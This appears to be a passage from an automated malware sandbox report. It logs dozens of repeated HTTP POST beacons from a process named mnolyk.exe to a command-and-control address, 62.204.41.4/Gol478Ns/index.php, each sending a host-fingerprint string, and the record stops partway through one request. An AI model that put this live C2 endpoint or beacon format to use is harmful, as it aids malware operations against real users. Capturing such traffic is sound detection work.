                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.149620056 CET486INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        286192.168.2.54997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.318607092 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.384452105 CET487INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        287192.168.2.54997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.552321911 CET488OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.615860939 CET488INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        288192.168.2.54997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.789921045 CET489OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.854299068 CET489INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        289192.168.2.54997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.054835081 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.118680954 CET490INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        29192.168.2.54971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.598088026 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.666188002 CET230INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        290192.168.2.54998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.304827929 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.367547035 CET491INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        291192.168.2.54998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.537805080 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.602508068 CET492INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        292192.168.2.54998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.788989067 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.852390051 CET493INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        293192.168.2.54998362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:07.033596039 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.099112988 CET494INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        294192.168.2.54998462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:07.273531914 CET495OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.337085009 CET495INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        295192.168.2.54998562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:07.516140938 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.578883886 CET496INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        296192.168.2.54998662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:07.762954950 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.826908112 CET497INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        297192.168.2.54998762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:08.011491060 CET498OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.074615002 CET498INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        298192.168.2.54998862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:08.271365881 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.335114002 CET499INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        299192.168.2.54998962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:08.504518032 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.566998959 CET500INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.54969362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:29.330240011 CET203OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:29.404603004 CET204INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        30192.168.2.54972062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.844825983 CET230OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.909267902 CET231INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        300192.168.2.54999062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:08.739973068 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.803266048 CET501INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        301192.168.2.54999162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:08.977328062 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.042072058 CET502INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        302192.168.2.54999262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:09.210071087 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
